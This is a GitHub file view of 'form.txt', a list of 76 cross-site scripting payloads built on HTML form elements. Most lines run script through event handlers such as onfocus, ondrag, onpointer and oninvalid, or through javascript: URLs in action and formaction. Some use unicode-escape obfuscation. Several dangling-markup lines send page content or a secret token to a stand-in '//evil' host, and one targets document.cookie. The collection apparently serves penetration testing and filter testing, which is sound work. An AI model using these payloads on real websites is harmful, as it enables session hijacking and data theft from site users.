-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathform.txt
76 lines (76 loc) · 4.99 KB
/
form.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<form draggable="true" ondrag="alert(1)">test</form>
<form draggable="true" ondragend="alert(1)">test</form>
<form draggable="true" ondragenter="alert(1)">test</form>
<form draggable="true" ondragleave="alert(1)">test</form>
<form draggable="true" ondragstart="alert(1)">test</form>
<form id=x tabindex=1 onactivate=alert(1)></form>
<form id=x tabindex=1 onbeforeactivate=alert(1)></form>
<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus>
<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus>
<form id=x tabindex=1 onfocus=alert(1)></form>
<form id=x tabindex=1 onfocusin=alert(1)></form>
<form onafterscriptexecute=alert(1)><script>1</script>
<form onbeforecopy="alert(1)" contenteditable>test</form>
<form onbeforecut="alert(1)" contenteditable>test</form>
<form onbeforepaste="alert(1)" contenteditable>test</form>
<form onbeforescriptexecute=alert(1)><script>1</script>
<form onblur=alert(1) tabindex=1 id=x></form><input autofocus>
<form onclick="alert(1)">test</form>
<form oncontextmenu="alert(1)">test</form>
<form oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<form oncut=alert(1) value="XSS" autofocus tabindex=1>test
<form ondblclick="alert(1)" autofocus tabindex=1>test</form>
<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus>
<form onkeydown="alert(1)" contenteditable>test</form>
<form onkeypress="alert(1)" contenteditable>test</form>
<form onkeyup="alert(1)" contenteditable>test</form>
<form onmousedown="alert(1)">test</form>
<form onmouseenter="alert(1)">test</form>
<form onmouseleave="alert(1)">test</form>
<form onmousemove="alert(1)">test</form>
<form onmouseout="alert(1)">test</form>
<form onmouseover="alert(1)">test</form>
<form onmouseup="alert(1)">test</form>
<form onmousewheel=alert(1)>requires scrolling
<form onpaste="alert(1)" contenteditable>test</form>
<form onpointerdown=alert(1)>XSS</form>
<form onpointerenter=alert(1)>XSS</form>
<form onpointerleave=alert(1)>XSS</form>
<form onpointermove=alert(1)>XSS</form>
<form onpointerout=alert(1)>XSS</form>
<form onpointerover=alert(1)>XSS</form>
<form onpointerrawupdate=alert(1)>XSS</form>
<form onpointerup=alert(1)>XSS</form>
<form onreset=alert(1)><input type=reset>
<form onsubmit=alert(1)><input type=submit>
<form><input oninvalid=alert(1) required><input type=submit>
<form><button formaction=javascript:alert(1)>CLICKME
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
<form><textarea oninvalid=alert(1) required><input type=submit>
<form><button name=x formaction=x><b>stealme
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
<form><button formaction=javascript:alert(1)>XSS
<form><button formaction=//evil>XSS</button><textarea name=x>
<form><input type=submit formaction=javascript:alert(1) value=XSS>
<form action=javascript:alert(1)><input type=submit value=XSS>
<form action=javascript:alert(1)><input type=submit>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
<form><input type=submit value="Click me" formaction=http://subdomain.labs.net/dangling_markup/name.html formtarget="
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<form><button formaction="javascript:javascript:alert(1)">X
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<form><isindex formaction="javascript:confirm(1)"
<form><a href="javascript:\u0061lert(1)">X
<form><iframe 	  src="javascript:alert(1)" 	;>
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
<form><button formaction="javascript:alert(1)">//INJECTX